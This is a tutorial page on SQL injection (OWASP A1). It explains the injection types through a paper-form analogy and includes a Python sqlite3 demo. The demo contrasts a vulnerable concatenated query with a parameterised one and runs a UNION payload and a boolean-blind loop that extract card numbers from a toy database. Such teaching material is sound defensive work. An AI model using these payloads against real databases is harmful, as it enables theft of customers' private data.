OWASP A1-INJECTION
SQL INJECTION
SQL injection, also known as SQLi, is a common attack vector in which attacker-supplied input is interpreted as SQL by the backend database, letting the attacker read or manipulate data that the application never intended to expose. This information may include any number of items, including sensitive company data, user lists or private customer details.
Fig1.1: SQL injection
Type of SQL injection
Error Based SQL injection
Union Based SQL injection
Blind SQL injection
Boolean Based Blind SQLi
Time-Based Blind SQLi
SQL Injection scenario
Imagine a big company that keeps all the records in paper form in a big room full of filing cabinets. In order to retrieve or make changes to files, someone will fill a simple fill-in-the-blanks form and then that form will be sent to a clerk who follows the instructions on the form.
For example:
Retrieve the billing records from start date _ _ _ to end date _ _ _ where the customer is _ _ _
Normally this would become something like this:
Retrieve the billing records from start date 01/01/2011 to end date 12/31/2011 where the customer is Billy Joe Bob
But in the hands of an unscrupulous person, maybe this form could be used for other purposes.
For example:
Retrieve the billing records from start date 01/01/2011 to end date 12/31/2011 where the customer is Robert Mensas and also retrieve the credit card numbers for all customers
By writing extra instructions into the blank meant for a name, the requester hijacks the fill-in-the-blanks form. If the clerk has not been trained to treat the contents of a blank as data rather than as instructions, they will simply execute everything on the form without thinking about it and hand all of the credit card information to the requester.
Or, alternately:
Retrieve the billing records from start date 01/01/2011 to end date 12/31/2011 where the customer is Robert Mensas and also add $100,000 to Robert Mensas’ account balance
This has similarly dangerous potential: a form meant only to retrieve records is now used to modify them.
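The scenario above, and the injection types listed earlier, as an added worked example that is not part of the original page. It uses Python's built-in sqlite3 module as a stand-in for the company's filing cabinets; the table names (billing, cards), the sample rows and the function names are all assumptions made for this illustration. billing_vulnerable builds the "form" by string concatenation, exactly as the clerk analogy describes; billing_safe binds the blanks as parameters so their contents can never be read as instructions. The example then plays the three techniques the list names that SQLite can demonstrate: an error probe (a lone quote) to find the injection point, a union-based query to pull the whole cards table through the billing form, and a boolean-based blind loop that recovers one customer's card number a digit at a time even though the form never displays card numbers.

```python
import sqlite3

# Constructed sample data for this example (not from the page).
def build_db():
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE billing (id INTEGER, customer TEXT, bill_date TEXT, amount REAL);
        CREATE TABLE cards (customer TEXT, card_number TEXT);
        INSERT INTO billing VALUES (1, 'Billy Joe Bob', '2011-03-01', 120.00);
        INSERT INTO billing VALUES (2, 'Billy Joe Bob', '2011-09-15', 80.50);
        INSERT INTO billing VALUES (3, 'Robert Mensas', '2011-05-20', 42.00);
        INSERT INTO cards VALUES ('Billy Joe Bob', '4111111111111111');
        INSERT INTO cards VALUES ('Robert Mensas', '5500000000000004');
    """)
    return conn

def billing_vulnerable(conn, customer, start, end):
    # The fill-in-the-blanks form built by concatenation: whatever is typed
    # into the "customer" blank becomes part of the SQL text the clerk runs.
    sql = ("SELECT id, customer, bill_date FROM billing"
           " WHERE bill_date BETWEEN '" + start + "' AND '" + end + "'"
           " AND customer = '" + customer + "'")
    return conn.execute(sql).fetchall()

def billing_safe(conn, customer, start, end):
    # Parameterised form: the blanks are bound as values, never parsed as SQL.
    sql = ("SELECT id, customer, bill_date FROM billing"
           " WHERE bill_date BETWEEN ? AND ? AND customer = ?")
    return conn.execute(sql, (start, end, customer)).fetchall()

def probe_injection_point(conn):
    # Error probe: a lone quote breaks the query's quoting. A database error
    # tells the tester that input reaches SQL unescaped. Error-based
    # extraction proper needs a DBMS that echoes data in its messages;
    # SQLite's messages do not, so here the error only confirms the hole.
    try:
        billing_vulnerable(conn, "'", "2011-01-01", "2011-12-31")
        return False
    except sqlite3.OperationalError:
        return True

# Union-based: "my name is Robert Mensas, and also retrieve the card numbers
# for all customers". The UNION must match the column count of the original
# SELECT (three here); '--' comments out the form's trailing quote.
UNION_PAYLOAD = "Robert Mensas' UNION SELECT 0, customer, card_number FROM cards--"

def blind_extract_card(conn, customer, length=16):
    # Boolean-based blind: the form never shows card numbers, so we ask
    # yes/no questions and read the answer from whether any rows come back.
    recovered = ""
    for pos in range(1, length + 1):
        for digit in "0123456789":
            payload = (customer + "' AND substr((SELECT card_number FROM cards"
                       " WHERE customer='" + customer + "')," + str(pos) + ",1)='"
                       + digit + "'--")
            if billing_vulnerable(conn, payload, "2011-01-01", "2011-12-31"):
                recovered += digit
                break
        else:
            break  # no digit matched at this position: value ended or is non-numeric
    return recovered

if __name__ == "__main__":
    db = build_db()
    print("injection point found:", probe_injection_point(db))
    print("union leak:", billing_vulnerable(db, UNION_PAYLOAD, "2011-01-01", "2011-12-31"))
    print("blind leak:", blind_extract_card(db, "Robert Mensas"))
    print("same payload, parameterised:", billing_safe(db, UNION_PAYLOAD, "2011-01-01", "2011-12-31"))
```

Two caveats a tester should keep in mind. The "add $100,000" variant of the scenario is a stacked query (a second statement after a semicolon), and whether it runs depends on the driver, not just the database: sqlite3's execute() refuses more than one statement, while the UNION and boolean tricks above need no stacking at all. Time-based blind injection, the fourth type on the list, works the same way as the boolean loop but reads the answer from response latency by injecting a delay such as MySQL's SLEEP() or SQL Server's WAITFOR DELAY; SQLite has no delay function, so it is not shown here.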
SQL injection Architecture View
Fig1.2: SQL injection Architecture View
Impact of SQL injection
The impact SQL injection can have on a business is far-reaching. A successful attack may result in the unauthorized viewing of user lists, the deletion of entire tables and, in certain cases, the attacker gaining administrative rights to a database, all of which are highly detrimental to a business.
When calculating the potential cost of an SQLI, it’s important to consider the loss of customer trust should personal information such as phone numbers, addresses, and credit card details be stolen.
While this vector can be used to attack any SQL database, websites are the most frequent targets.